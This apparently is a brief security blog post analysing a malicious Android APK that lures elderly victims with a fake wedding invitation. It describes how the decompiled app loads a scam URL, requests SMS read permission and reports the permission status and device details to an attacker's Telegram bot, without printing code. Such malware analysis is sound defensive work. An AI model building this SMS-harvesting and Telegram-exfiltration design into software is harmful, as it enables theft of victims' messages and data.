Introduction : بِسْمِ اللهِ الرَّحْمٰنِ الرَّحِيْمِ

First and foremost, I would like to express my gratitude to Fareed Fauzi (Ayed) from NetByteSec for providing me with the APK file. Without his assistance, this blog post would not have been possible.

chat

This blog post will be brief and concise, aiming to focus primarily on the malicious aspect of the code within the application.

pakcik siapa yang kahwin?

sapa

Recently, there have been reports about scammers attempting to deceive elderly citizens by luring them into installing a malicious application under the pretext of an invitation to a fictitious wedding.

MainActivity

decompiled

When decompiling the application, several classes can be observed. One of these classes is the MainActivity class.

main

This class serves as the entry point of the Android application and typically loads the onCreate() method.

Within the onCreate() method, various actions are performed. These include loading a URL from https://ejemputan.com/kadkahwindigital and checking the Android version of the device.

check1

Starting from line 44, the code checks for the permission to read SMS. If the permission has not been granted yet, the requestPermissions() method is called. This method essentially prompts the device to grant permission for reading SMS.

What the bot?

bot1

Based on the result of the permission check, these methods execute specific actions. Regardless of whether the permission is granted or not, they send an HTTP request to a Telegram bot. The bot then processes the result as a Telegram message using the sendMessage API endpoint from Telegram.

The purpose of the bot is to notify the attacker about the status of the permission, indicating whether it has been granted or not.

bot2

Furthermore, the application also sends device details to the attacker. This could include information such as the device model, operating system version, unique identifiers, and other relevant device-specific details.

deviceid